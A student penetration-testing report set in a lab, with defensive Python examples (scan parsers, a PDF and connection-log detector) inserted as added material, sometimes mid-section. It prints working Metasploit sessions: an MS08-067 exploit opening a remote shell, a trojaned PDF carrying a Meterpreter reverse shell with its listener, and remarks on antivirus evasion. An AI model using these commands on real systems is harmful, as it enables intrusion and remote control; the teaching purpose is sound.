MIEIC - SSIN (Computer Security)
Tomé Duate, Robert Kulzer
Final report, Group 5, T9, 2011/2012
December 6

1 Introduction

Numerous studies of malware development over the past decade all show rapid growth in recent years. Figure 1 shows one of these malware statistics.

Figure 1: Number of Entries on the Google Safe Browsing Malware List

Many software developers do not pay much attention to possible security flaws while developing applications. A common mistake is to think that security can be implemented later on. Writing robust code means thinking about security from the beginning to the end.
2 Goals

In this project we want to create awareness among our fellow students of writing secure code by showing how software can be exploited. We want to provide knowledge of certain tools to check for vulnerabilities, from the network layer up to the application layer. Moreover, we want to explain the value of penetration testing and why it is crucial for today's companies. We want to explain the general guidelines of a penetration tester [1]:

1. Pre-engagement Interactions
2. Intelligence Gathering
3. Threat Modeling
4. Vulnerability Analysis
5. Exploitation
6. Post Exploitation
7. Reporting

As penetration tests are conducted either as Black box and/or White box tests, we want to explain and outline the differences between these two paradigms. Furthermore, we will provide information on noteworthy web sites to get more involved in the matter. In addition, there is a large variety of security tools any interested student should be aware of and may want to try. All this information is included in this work. We also intend to state the legal concerns which have to be taken into account before starting a penetration test.
3 Approach

The attacked machines in this demonstration are virtual machines. This gives a close-to-real-world example without harming actual machines. The whole demonstration follows the penetration testing guideline introduced in section 2 (Goals).

The first machine is a standard Windows XP installation with Service Pack 3. This machine is called WinXPSP3. The other machine is a standard Windows 7 installation with Service Pack 1; this example should demonstrate that even newer systems can be compromised. This machine is called Win7. In both cases the attacker is in the same network as the victim; there is no firewall, VPN, IDS or anything else shielding the targets.

3.1 Metasploit

Many penetration testers use security frameworks for their work. They provide a more convenient and efficient way to manage scans and vulnerabilities, and certain tasks can be performed much faster with them. Metasploit is such a framework [2]: it is open source and is used to retrieve information on vulnerabilities of targeted systems.

3.2 Other software

- Armitage: a GUI for the Metasploit framework [3]
- nmap: a free and open source utility for network exploration and security auditing [4]
- whois: looks up the registered users or assignees of an Internet resource (domain name, IP address, and so on)
- host: a DNS lookup utility
- telnet: a network protocol and client to connect to specified ports on a remote host
- and many more...

4 Getting in touch with the target

4.1 Pre-engagement Interactions

The Penetration Tester's Guide [1] defines this stage as the negotiation point. Here the security engineer and the client meet and discuss the terms of the security evaluation. The point of this contract is to define the goal of the endeavour. Furthermore, the penetration tester may decide between a Black box and/or a White box test.

The Black box test is performed without knowledge of the internal structure or routines of the targeted system. Such tests are mainly used to check whether the specifications are implemented the way they are meant to be. In terms of penetration testing, this test is considered a real-world example. The opposite is the White box test, where the internals are known. Thus the penetration tester can launch wider-scale tests against a system from the inside. This approach simulates a malicious actor on the inside who has the authorization to access sensitive areas guarded by various mechanisms. The hybrid method, sometimes referred to as Grey box testing, assumes the security engineer has some knowledge of the internals but does not have credentials to obtain higher security clearance. This level can be reached after gathering intelligence on the targeted system while still being at a basic user level. Depending on company policy, it may be interesting to keep the employees (including the IT department) unaware of a penetration test.

Figure 2: Black and White box testing

4.2 Intelligence Gathering

In this stage the penetration tester tries to gather as much information on the targeted system as possible. The more information he gathers, the more elaborate his attacks and results can be. Common techniques are host fingerprinting, Google hacking, social engineering and so on. The security engineer wants to identify the defence systems within the network, such as Intrusion Detection Systems (IDS) [6], firewalls, honeypots [5] and the like. Depending on the strategy, the penetration tester may want to be as noisy as possible to attract attention, or silent to stay under the radar of the defence systems. He could also combine both strategies, distracting the defence systems from the actual attack with different IP ranges and heavy port scans. There are numerous scenarios for performing the penetration test; the attacker selects appropriate measures depending on the given configuration of the network.

    # nmap -sS -PN WinXPSP3
    Starting Nmap 5.21 ( http://nmap.org )
    Nmap scan report for WinXPSP3
    Host is up (s latency).
    Not shown: 997 closed ports
    PORT    STATE SERVICE
    135/tcp open  msrpc
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    MAC Address: 08:00:27:18:22:B6 (Cadmus Computer Systems)

Listing 1: Default nmap scan on single host

In a very basic nmap scan on WinXPSP3 (refer to listing 1) the output provides information on the open ports. This gives the tester a basic idea of which services are running on a machine and may have flaws. The option -sS uses a TCP SYN as connection attempt (no full connection is established) and -PN skips host discovery, assuming the host is online. These two switches are a very basic way to stay a little more silent. If nmap were used without any options, a full connection would be established, hence the process on the scanned host would most certainly be aware of the connection attempt.

There are more elaborate approaches to minimize the noise. With the so-called TCP idle scan the attacker can spoof the IP address of another host in the network and thus evade detection. In order to perform this method, one has to identify hosts in the network that have an incremental IP ID (packet fragment identification number). The Metasploit framework comes with such a scanner; the action is shown in listing 2.

    msf > use auxiliary/scanner/ip/ipidseq
    msf auxiliary(ipidseq) > set RHOSTS <network>/24
    msf auxiliary(ipidseq) > set THREADS 50
    msf auxiliary(ipidseq) > run
    [*] Scanned 045 of 256 hosts (017% complete)
    [*] Scanned 086 of 256 hosts (033% complete)
    [*] Scanned 095 of 256 hosts (037% complete)
    [*] <host>'s IPID sequence class: Incremental!
    ...
    [*] Auxiliary module execution completed
    msf auxiliary(ipidseq) > nmap -PN -sI <zombie host> WinXPSP3

Listing 2: Metasploit TCP idle scan

Listing 2 shows that the host whose IPID sequence class is reported as Incremental is a valid candidate for a TCP idle scan. The option -sI tells nmap that the following hostname or IP address is a so-called zombie host, used for the scan.
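The property the ipidseq scanner tests for, written out as code: the following is an added example in Python, not part of the original report and not Metasploit's or nmap's own code. It takes the IP ID values read from successive packets a host sent (a defender can collect these from a packet capture of their own hosts) and classifies the sequence in the spirit of nmap's IP ID sequence classes. The thresholds are a simplification chosen for this example, not nmap's exact algorithm, and the sample sequences are constructed.

```python
"""Classify a host's IP ID sequence, the property the ipidseq scanner tests.

Added example, not part of the original report.  It follows the idea behind
nmap's IP ID sequence classes and Metasploit's auxiliary/scanner/ip/ipidseq
module, but the thresholds are a simplification chosen for this example, not
nmap's exact algorithm.
"""
from typing import List

IPID_MODULUS = 1 << 16  # the IP ID field is 16 bits wide


def ipid_deltas(ids: List[int]) -> List[int]:
    """Differences between consecutive IP IDs, modulo 2^16 to handle wrap-around."""
    return [(b - a) % IPID_MODULUS for a, b in zip(ids, ids[1:])]


def _byteswap16(value: int) -> int:
    """Swap the two bytes of a 16-bit value (some hosts write the field little-endian)."""
    return ((value & 0xFF) << 8) | (value >> 8)


def classify_ipid_sequence(ids: List[int]) -> str:
    """Return a sequence class name in the spirit of nmap's ipidseq output."""
    if len(ids) < 2:
        raise ValueError("need at least two IP ID samples")
    if all(i == 0 for i in ids):
        return "All zeros"
    deltas = ipid_deltas(ids)
    if all(d == 0 for d in deltas):
        return "Constant"
    # Small, strictly positive steps: the classic predictable counter.
    if all(1 <= d <= 9 for d in deltas):
        return "Incremental"
    # Same counter, but the host wrote the field in the wrong byte order.
    swapped = ipid_deltas([_byteswap16(i) for i in ids])
    if all(1 <= d <= 9 for d in swapped):
        return "Broken little-endian incremental"
    # Always increasing, but by large irregular amounts.
    if all(0 < d < 20000 for d in deltas):
        return "Random positive increments"
    return "Randomized"


def usable_as_idle_scan_zombie(ids: List[int]) -> bool:
    """True when the sequence is predictable enough for an idle scan.

    A defender wants this to be False for every host on the network."""
    return classify_ipid_sequence(ids) in ("Incremental", "Broken little-endian incremental")


if __name__ == "__main__":
    # Constructed samples, not captured data.
    samples = {
        "xp-like": [0x6400, 0x6500, 0x6600, 0x6700],  # little-endian counter
        "linux-like": [41233, 3, 60021, 22987],        # randomized IDs
        "zeros": [0, 0, 0, 0],
    }
    for name, ids in samples.items():
        print(f"{name:12s} {classify_ipid_sequence(ids):36s} "
              f"zombie={usable_as_idle_scan_zombie(ids)}")
```

The wrap-around handling matters: a counter that rolls over from 65535 to 0 is still a counter, and the byte-swapped check is what catches hosts that look randomized at first glance but are really counting in the other byte order.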
Listing 3 shows another useful nmap option, -A, to gather more information on a target system: not just the fingerprint of the OS running on the target, but also whether there are routers in between (here the network distance is 1 hop).

    # nmap -sS -PN -A WinXPSP3
    Starting Nmap 5.21 ( http://nmap.org ) at :59 WET
    Nmap scan report for WinXPSP3
    Host is up (s latency).
    Not shown: 997 closed ports
    PORT    STATE SERVICE      VERSION
    135/tcp open  msrpc        Microsoft Windows RPC
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
    MAC Address: 08:00:27:18:22:B6 (Cadmus Computer Systems)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows XP SP2 or SP3
    Network Distance: 1 hop
    Service Info: OS: Windows
    Host script results:
      nbstat: NetBIOS name: HACKME, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:18:22:B6
      smb-os-discovery:
        OS: Windows XP (Windows 2000 LAN Manager)
        Name: WORKGROUP\HACKME
        System time: :59:38 UTC+1
      smbv2-enabled: Server doesn't support SMBv2 protocol
    HOP RTT ADDRESS
    1   ms
    OS and Service detection performed.

Listing 3: Nmap OS discovery

But nmap is not the only tool to gather information on the network and its hosts. Classic UNIX tools like whois, host and ettercap, but also capable network sniffers and scanners like Wireshark [7] and OpenVAS [8], serve the penetration tester in gathering intelligence. Listing 4 shows the host and whois output for up.pt. At first glance this information does not seem to be of any value to a penetration tester, but the mail server and DNS addresses can already be identified without even making contact with any of the up.pt hosts. This information is especially vital if a security engineer is evaluating in a Black box scenario.

    # host -t mx up.pt
    up.pt mail is handled by 20 relay2.up.pt.
    up.pt mail is handled by 10 relay1.up.pt.
    # whois up.pt
    Titular / Registrant
        Universidade do Porto
        Reitoria
        Praça Gomes Teixeira
        Porto
        Porto
        contacto dnsup@reit.up.pt
    ...
    Nameserver Information
    Nameserver: up.pt NS dns1.up.pt.
    ...
    Nameserver: dns3.up.pt. A
    Nameserver: dns4.up.pt. A
    ...
    Nameserver: dns3.up.pt. AAAA :::b10::

Listing 4: Host and whois queries on up.pt

5 Pin-point the target system

5.1 Threat Modeling

In this stage the attacker isolates the most promising approach. He looks for the most effective attack according to the specifications made in section 4.1 (Pre-engagement Interactions). Here the penetration tester works the way an adversary would try to penetrate the system. The identification of vulnerabilities and security flaws in a system is not an easy task. As explained in section 4.2, the attacker has to operate cautiously.

The security engineer knows which ports are open. Now he wants to learn which software uses each port and which version of that program. Listing 5 shows an example of how to identify a web server's software and its version. The output states Apache version 2.2.3 and that the server runs on Linux, specifically the SuSE distribution. This output can be cross-checked with the findings from OS fingerprinting.

    # telnet www.fe.up.pt 80
    Trying
    Connected to sifeup.fe.up.pt ().
    Escape character is '^]'.
    GET /index.html HTTP/1.1

    HTTP/1.1 400 Bad Request
    Date: Sat, 12 Nov :25:34 GMT
    Server: Apache/2.2.3 (Linux/SUSE)
    Content-Length: 226
    Connection: close
    Content-Type: text/html; charset=iso

Listing 5: Determine the web server version

Having this information, the attacker may proceed to web pages listing recently discovered vulnerabilities in this Apache version, or he could search with Metasploit. Yet another way to discover vulnerabilities is to use nmap scripts: nmap can also scan for certain vulnerabilities on hosts, and scripts for the nmap scripting engine (NSE) [10] can easily be developed by users and are publicly available. Listing 6 shows an smb scan on WinXPSP3. The output reports the MS08-067 vulnerability [9]. This critical flaw allows remote code execution.
Such an attack lets the attacker gain remote access, hence compromising the entire system.

    # nmap -A -sS -PN WinXPSP3 --script=smb-check-vulns
    ...
    NSE: Script Scanning completed.
    Nmap scan report for WinXPSP3
    Host is up (s latency).
    ...
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows XP SP2 or SP3
    Network Distance: 1 hop
    Service Info: OS: Windows
    Host script results:
      smb-check-vulns:
        MS08-067: LIKELY VULNERABLE
        Conficker: Likely CLEAN
        regsvc DoS: CHECK DISABLED
        SMBv2 DoS (CVE ): CHECK DISABLED

Listing 6: Nmap smb vulnerability scan

5.2 Vulnerability Analysis

This stage is concerned with the question of how to gain access to the system. Here the security engineer puts together the data he has gathered up to this point to develop the most effective method to execute the attack. For this work we select the MS08-067 exploit, as it grants total access to the system.

6 Exploitation Process

6.1 Exploitation

After careful planning and information gathering the actual attack can be carried out. In contrast to what was pointed out in section 4.2 (Intelligence Gathering), the attacker should proceed as silently as possible here. Massive and random launches of exploits are usually not the way to go in this stage.

Listing 7 shows how easily remote access can be obtained using the Metasploit framework. In this scenario the command-line version of Metasploit is used. At first, the IPv4 address of the attacker's machine is set. The payload is the remote code which will be executed by abusing the vulnerability; in this case the payload is a remote shell listening on port 4444 on the victim's machine. In the next step, the MS08-067 vulnerability is searched for via the search engine provided by the Metasploit framework. After locating the right module, it is loaded and the penetration tester may configure the attack further.
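Listings 1, 3 and 6 are all nmap's normal output, and a defender gets the most out of such scans by turning them into an inventory of exposed services and script findings. The following is an added example in Python, not part of the original report and not nmap's own code: a small parser for that output format that reports hosts with open SMB ports or an NSE script result marked VULNERABLE. SAMPLE is constructed for the example (the latency figures and the Win7 block are made up; the WinXPSP3 values follow listing 6, and the `|` prefix on script-result lines is nmap's normal-output format).

```python
"""Parse nmap normal output into a per-host inventory and flag SMB exposure.

Added example, not part of the original report or of nmap.  SAMPLE is a
constructed piece of nmap normal output; only the WinXPSP3 values follow
the listings in the report.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE = """\
Nmap scan report for WinXPSP3
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:18:22:B6 (Cadmus Computer Systems)
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop

Host script results:
| smb-check-vulns:
|   MS08-067: LIKELY VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED
|_  SMBv2 DoS: CHECK DISABLED

Nmap scan report for Win7
Host is up (0.0009s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
445/tcp open  microsoft-ds
OS details: Microsoft Windows 7
"""

REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SMB_PORTS = {139, 445}


@dataclass
class HostReport:
    name: str
    ports: List[dict] = field(default_factory=list)
    os_details: Optional[str] = None
    script_results: Dict[str, str] = field(default_factory=dict)


def parse_nmap_output(text: str) -> List[HostReport]:
    """Split the output into per-host blocks and pull out ports, OS and NSE results."""
    hosts: List[HostReport] = []
    current: Optional[HostReport] = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = REPORT_RE.match(line)
        if m:
            current = HostReport(name=m.group(1))
            hosts.append(current)
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current.ports.append({"port": int(port), "proto": proto, "state": state,
                                  "service": service, "version": version or ""})
            continue
        if line.startswith("OS details: "):
            current.os_details = line[len("OS details: "):]
            continue
        if line.startswith("|"):
            # NSE output: "| key: value" lines, the last one prefixed "|_".
            body = line.lstrip("|_").strip()
            key, sep, value = body.partition(":")
            if sep and value.strip():  # skip script-name headers like "smb-check-vulns:"
                current.script_results[key.strip()] = value.strip()
    return hosts


def findings(hosts: List[HostReport]) -> List[dict]:
    """Hosts with open SMB ports or a script result that says VULNERABLE."""
    out = []
    for h in hosts:
        smb_open = sorted(p["port"] for p in h.ports
                          if p["state"] == "open" and p["port"] in SMB_PORTS)
        vulnerable = [k for k, v in h.script_results.items()
                      if "VULNERABLE" in v.upper() and "NOT VULNERABLE" not in v.upper()]
        if smb_open or vulnerable:
            out.append({"host": h.name, "os": h.os_details,
                        "smb_ports": smb_open, "vulnerable": vulnerable})
    return out


if __name__ == "__main__":
    for finding in findings(parse_nmap_output(SAMPLE)):
        print(finding)
```

Running it prints one finding per host: WinXPSP3 with ports 139 and 445 open and MS08-067 flagged, and Win7 with only port 445 exposed. For real scans, nmap's XML output (-oX) is the more robust input format, but the normal output is what the listings in this report show.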
The available parameters can be viewed by showing the options. The required fields are marked and have to be provided. After setting up all the essential parameters the actual exploit can be started.

    msf > set LHOST        < Attacking machine
    LHOST =>
    msf > set PAYLOAD windows/shell/bind_tcp
    PAYLOAD => windows/shell/bind_tcp
    msf > search ms08_067
    Matching Modules
    ================
       Name                         Disclosure Date  Rank   Description
       exploit/.../ms08_067_netapi                   great  Microsoft ...
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show options
    Module options (exploit/windows/smb/ms08_067_netapi):
       Name     Current Setting  Required  Description
       RHOST                     yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name
    ...
    Payload options (windows/shell/bind_tcp):
       Name      Current Setting  Required  Description
       EXITFUNC  thread           yes       Exit technique: seh, ...
       LPORT     4444             yes       The listen port
       RHOST                      no        The target address
    Exploit target:
       Id  Name
       0   Automatic Targeting
    msf exploit(ms08_067_netapi) > set RHOST WinXPSP3
    RHOST => WinXPSP3
    msf exploit(ms08_067_netapi) > set target 6
    target => 6
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (240 bytes) to WinXPSP3
    [*] Command shell session 1 opened ( : -> WinXPSP3: ) at
    Microsoft Windows XP [Version ]
    (C) Copyright Microsoft Corp.
    C:\WINDOWS\system32>

Listing 7: Getting remote shell after MS08-067 exploit

There are of course numerous payloads to choose from. One of the most intriguing is Meterpreter [11]: this payload gives the penetration tester a wide range of tools and mechanisms to control the client. As the attacker may want to use one or more of the compromised systems as a platform for further attacks inside the network, Meterpreter can be a valuable asset for keeping control of the attacked systems.

6.1.1 Meterpreter

Meterpreter is short for Meta-Interpreter, an advanced payload for the Metasploit framework. It provides a much easier way to a richer feature set for the framework; the alternative would be a lot of assembly code, which can be very exhausting. To stay undetected, Meterpreter operates only in memory. Figures 3 and 4 show the interface of Armitage.

6.2 Using application exploits

Nowadays, operating systems are no longer the main target of malware developers [12]. Injection, XSS and misconfigured session management are much more pressing topics for security engineers. In addition, social engineering is still one of the most effective ways to compromise a system. Here is an example of embedding malicious code in a benign-looking PDF file. When the file is opened with Adobe Reader [13] (version 8.x and 9.x), it executes the malicious code.

6.2.1 Malicious pdf

Listing 8 shows the way to create a malicious PDF file, using the Metasploit framework to embed code in an originally legitimate document.
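The defender's counterpart to the malicious PDF technique, as an added example in Python that is not part of the original report and not Metasploit's or any antivirus vendor's code: a document of this kind needs an /EmbeddedFile object plus an action (/Launch, /OpenAction) to start it, so a static check can look for exactly those keys. Because PDF allows names to be written with #xx escapes and object contents to sit inside FlateDecode streams, the check decodes the escapes and inflates zlib streams first; otherwise plain string matching is defeated by exactly the kind of obfuscation section 6.2 mentions. All PDF fragments, the keyword list and the suspicion rule are constructed for this example; it is a heuristic, not a scanner engine.

```python
"""Static check for the PDF features an embedded-executable document relies on.

Added example, not part of the original report or of Metasploit.  The
keyword list, the suspicion rule and all sample fragments are constructed
for this example; this is a heuristic, not an antivirus engine.
"""
import re
import zlib
from typing import Dict

# Keys whose presence warrants a closer look.  Matched as whole names so
# that "/JS" does not fire on a name that merely starts with "/JS".
RISKY_KEYS = ["/Launch", "/EmbeddedFile", "/OpenAction", "/AA", "/JavaScript", "/JS"]
NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.S)


def decode_name_escapes(data: bytes) -> bytes:
    """PDF allows /La#75nch for /Launch; undo that so keyword matching is exact."""
    return NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every zlib (FlateDecode) stream to the data."""
    inflated = []
    for m in STREAM_RE.finditer(data):
        d = zlib.decompressobj()
        try:
            inflated.append(d.decompress(m.group(1)) + d.flush())
        except zlib.error:
            continue  # not a zlib stream (image data, raw bytes, ...)
    return data + b"\n" + b"\n".join(inflated)


def scan_pdf(data: bytes) -> Dict[str, int]:
    """Count occurrences of each risky key after de-obfuscation."""
    text = decode_name_escapes(inflate_streams(data))  # inflate first, then decode
    hits: Dict[str, int] = {}
    for key in RISKY_KEYS:
        pattern = re.escape(key.encode()) + rb"(?![A-Za-z0-9])"
        n = len(re.findall(pattern, text))
        if n:
            hits[key] = n
    return hits


def is_suspicious(data: bytes) -> bool:
    """Launch/JavaScript actions, or an embedded file wired to an open action."""
    hits = scan_pdf(data)
    return (any(k in hits for k in ("/Launch", "/JavaScript", "/JS"))
            or ("/EmbeddedFile" in hits and "/OpenAction" in hits))


# Constructed PDF fragments (not valid for a viewer, enough for the scanner).
BENIGN = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
          b"2 0 obj << /Type /Pages /Count 0 /Kids [] >> endobj\n"
          b"trailer << /Root 1 0 R >>\n%%EOF\n")
EMBEDDED_EXE = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
                b"3 0 obj << /S /Launch /F (payload.exe) >> endobj\n"
                b"4 0 obj << /Type /EmbeddedFile /Length 8 >>\nstream\n"
                b"MZ\x90\x00\x03\x00\x00\x00\nendstream\nendobj\n")
OBFUSCATED = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Open#41ction 3 0 R >> endobj\n"
              b"3 0 obj << /S /#4Caunch /F (payload.exe) >> endobj\n")
COMPRESSED = (b"%PDF-1.4\n5 0 obj << /Filter /FlateDecode >>\nstream\n"
              + zlib.compress(b"<< /S /Launch /F (payload.exe) >>")
              + b"\nendstream\nendobj\n")

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN), ("embedded-exe", EMBEDDED_EXE),
                      ("obfuscated", OBFUSCATED), ("compressed", COMPRESSED)]:
        print(f"{name:13s} suspicious={is_suspicious(doc)} hits={scan_pdf(doc)}")
```

The order inside scan_pdf is deliberate: streams are inflated before name escapes are decoded, so a /Launch hidden inside a compressed object is found as well. What this check still does not see is content in encrypted documents or in nested object streams that are themselves compressed, which is the kind of gap the report's remark about obfuscation points at.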
Figure 3: Armitage interface, after scanning the network

Figure 4: Meterpreter session opened after compromising Win7

    msf > search adobe pdf embedded
    Matching Modules
    ...
    msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
    msf ... > set FILENAME <output path>/buhu_m.pdf
    FILENAME => <output path>/buhu_m.pdf
    msf ... > set INFILENAME <input path>/IPTablesFlowChart.pdf
    INFILENAME => <input path>/IPTablesFlowChart.pdf
    msf ... > set LAUNCH_MESSAGE Foobar
    LAUNCH_MESSAGE => Foobar
    msf ... > set LHOST
    LHOST =>
    msf ... > show options
    Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):
       Name            Current Setting
       EXENAME
       FILENAME        <output path>/buhu_m.pdf
       INFILENAME      <input path>/IPTablesFlowChart.pdf
       LAUNCH_MESSAGE  Foobar
    Payload options (windows/meterpreter/reverse_tcp):
       Name      Current Setting  Required  Description
       EXITFUNC  process          yes       Exit technique: seh, ...
       LHOST                      yes       The listen address
       LPORT     4444             yes       The listen port
    ...
    msf exploit(adobe_pdf_embedded_exe) > exploit
    [*] Reading in <input path>/IPTablesFlowChart.pdf...
    [*] Parsing <input path>/IPTablesFlowChart.pdf...
    [*] Parsing Successful.
    [*] Using windows/meterpreter/reverse_tcp as payload...
    [*] Creating <output path>/buhu_m.pdf file...
    [+] <output path>/buhu_m.pdf...

Listing 8: Embedding malicious code in a pdf file using Metasploit

The hard part of the penetration tester's work is now to convince a victim to open this document in a version of Adobe Reader which has this vulnerability. Before the victim opens the document, the attacker has to make sure that a connection handler is waiting for incoming connections, see listing 9.

    msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST
    LHOST =>
    msf exploit(handler) > exploit
    [*] Started reverse handler on :
    [*] Starting the payload handler...

Listing 9: Generate a generic listener using Metasploit

After completing these steps, the penetration tester should see the incoming connection. Please refer to figure 5 to see Meterpreter with Armitage in action.

Figure 5: Taking a screenshot from the running compromised machine

However, this is a rather simple approach. The attempt would most certainly fail if the machine used a virus scanner. Checking the file with the online malware scanner virustotal.com [14] shows that most of the virus engines can identify this malformed PDF document; see figure 6 for the results. On the other hand, it is not so difficult to prevent detection by virus scan engines: obfuscation techniques make the file look innocuous to them.

Figure 6: Virustotal scan on the embedded Meterpreter pdf document.

6.3 Post Exploitation

After successfully compromising one or more systems, the penetration tester wants to gather valuable information and intelligence. The security engineer wants to expose the most secure systems in the network, the ones the organization is trying hardest to protect. In a software company this may be their repository; a bank tries to shield its financial services. These are the systems the penetration tester is after. As it may be easier to compromise an insignificant host first, the penetration tester may then use this machine to continue towards more protected systems. Here Metasploit, or more precisely Meterpreter, provides options to stay on attacked machines, for example by switching from the process used for the attack to another one, to stay undetected.

7 Reporting

The organization that hires penetration testers expects them to reveal vulnerabilities in its networks and how they can be exploited. Hence this stage is one of the most important. It is not just the holes in the security systems a penetration tester uncovers; he is also supposed to raise awareness of the flaws in the configuration, to hinder upcoming attacks. The security engineer will also provide solutions to the discovered vulnerabilities and, if possible, eliminate them on a broader scale. For example, if SQL injections are possible, the input for these instances should be sanitized, but the underlying problem still remains. He may also show alternatives that, if possible, eliminate the problem entirely. As for the examples in this work, most of the vulnerabilities are caused by outdated applications. These security holes can be closed rather easily, but there are still numerous possibilities to find entrance into an environment considered secure.

8 Conclusion

Even though nowadays many companies and governments invest more money in their IT security departments, the number of news items about compromised databases, industrial espionage and so on is still rising. Organized crime has discovered the huge potential profit in online crime. But also crash kids (aka script kiddies) and self-assigned freedom fighters are a threat to the data each one of us wants to protect. Penetration tests can be one instrument to unveil security flaws in networks and systems. These security engineers operate as if they were hackers, but they have permission from the organization that hired them. It is most certainly not the magic formula to prevent future attacks, but it raises the bar an attacker has to surpass in order to gain access. Professional attackers have a business plan just as companies do: if the amount of resources they have to invest is higher than the expected profit, they will most likely reconsider their attack plans. Hackers who attack for fun or prestige will also have to spend more of their time breaking into systems previously tested by penetration testers. Furthermore, penetration testers can help raise awareness of vulnerabilities in software but also of social engineering.
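The report's exploitation chapter shows two shells that a defender can look for in connection logs: the bind shell of listing 7, which listens on port 4444 on the victim right after the SMB exploit, and the reverse_tcp payload of listing 9, which makes the victim connect out to the handler's port 4444. The following is an added example in Python, not part of the original report and not Metasploit's code, that applies two detection rules to connection records. The log format (one "timestamp src= dst= dport= proto=" record per new connection), the addresses and all the records are constructed for this example; a real firewall or NetFlow export needs its own parser, but the rules carry over.

```python
"""Correlate connection logs to spot the shells from listings 7 and 9.

Added example, not part of the original report.  Two rules:
  1. a host connects to SMB (445) on a target and, within two minutes,
     opens another port on the same target: the shape of an SMB exploit
     followed by a bind shell (listing 7);
  2. any connection to the Metasploit default handler port 4444, which is
     both the bind shell's port and the reverse_tcp handler's port
     (listing 9).
The log format and every record below are constructed for this example.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

LINE_RE = re.compile(r"^(\S+)\s+src=(\S+)\s+dst=(\S+)\s+dport=(\d+)\s+proto=(\S+)$")
SMB_PORT = 445
DEFAULT_HANDLER_PORTS = {4444}
CORRELATION_WINDOW = timedelta(seconds=120)

# Constructed sample: 10.0.0.5 is the attacker, 10.0.0.20 the XP victim,
# 10.0.0.21 a host that opened the PDF and calls back to the handler,
# 10.0.0.7 an administrator whose later RDP session must not be flagged.
SAMPLE_LOG = """\
2011-12-06T10:15:01 src=10.0.0.5 dst=10.0.0.20 dport=445 proto=tcp
2011-12-06T10:15:03 src=10.0.0.5 dst=10.0.0.20 dport=4444 proto=tcp
2011-12-06T10:20:00 src=10.0.0.7 dst=10.0.0.20 dport=445 proto=tcp
2011-12-06T10:31:00 src=10.0.0.7 dst=10.0.0.20 dport=3389 proto=tcp
2011-12-06T11:02:10 src=10.0.0.21 dst=10.0.0.5 dport=4444 proto=tcp
2011-12-06T11:05:00 src=10.0.0.8 dst=10.0.0.20 dport=80 proto=tcp
"""


def parse_flows(text: str) -> List[dict]:
    """Parse the constructed log format into time-sorted connection records."""
    flows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # tolerate unrelated lines
        ts, src, dst, dport, proto = m.groups()
        flows.append({"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
                      "dport": int(dport), "proto": proto})
    flows.sort(key=lambda f: f["ts"])
    return flows


def detect(flows: List[dict]) -> List[dict]:
    """Apply both rules; returns one alert dict per match, in log order."""
    alerts: List[dict] = []
    last_smb: Dict[Tuple[str, str], datetime] = {}  # (src, dst) -> last SMB connection
    for f in flows:
        pair = (f["src"], f["dst"])
        if f["dport"] == SMB_PORT:
            last_smb[pair] = f["ts"]
            continue
        base = {"ts": f["ts"].isoformat(), "src": f["src"], "dst": f["dst"], "dport": f["dport"]}
        if pair in last_smb and f["ts"] - last_smb[pair] <= CORRELATION_WINDOW:
            alerts.append({"rule": "smb-then-other-port", **base})
        if f["dport"] in DEFAULT_HANDLER_PORTS:
            alerts.append({"rule": "default-handler-port", **base})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_flows(SAMPLE_LOG)):
        print(alert)
```

On the sample, the 4444 connection two seconds after the SMB exploit triggers both rules, the callback from 10.0.0.21 to the attacker triggers the handler-port rule, and the administrator's RDP session eleven minutes after an SMB connection stays quiet because it is outside the correlation window. The port-based rule is only a starting point, since a tester or attacker can pick any LPORT; the correlation rule does not depend on the port number.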
References

[1] David Kennedy, Jim O'Gorman, Devon Kearns, and Mati Aharoni. Metasploit: The Penetration Tester's Guide.
[2] Rapid7 LLC. Metasploit Framework.
[3] Raphael Mudge. Armitage: Cyber attack management for Metasploit.
[4] Gordon Lyon. nmap: Discovering hosts and services on a computer network.
[5] Provos, N. A virtual honeypot framework. Proceedings of the 13th USENIX Security Symposium, Volume 13 (2004).
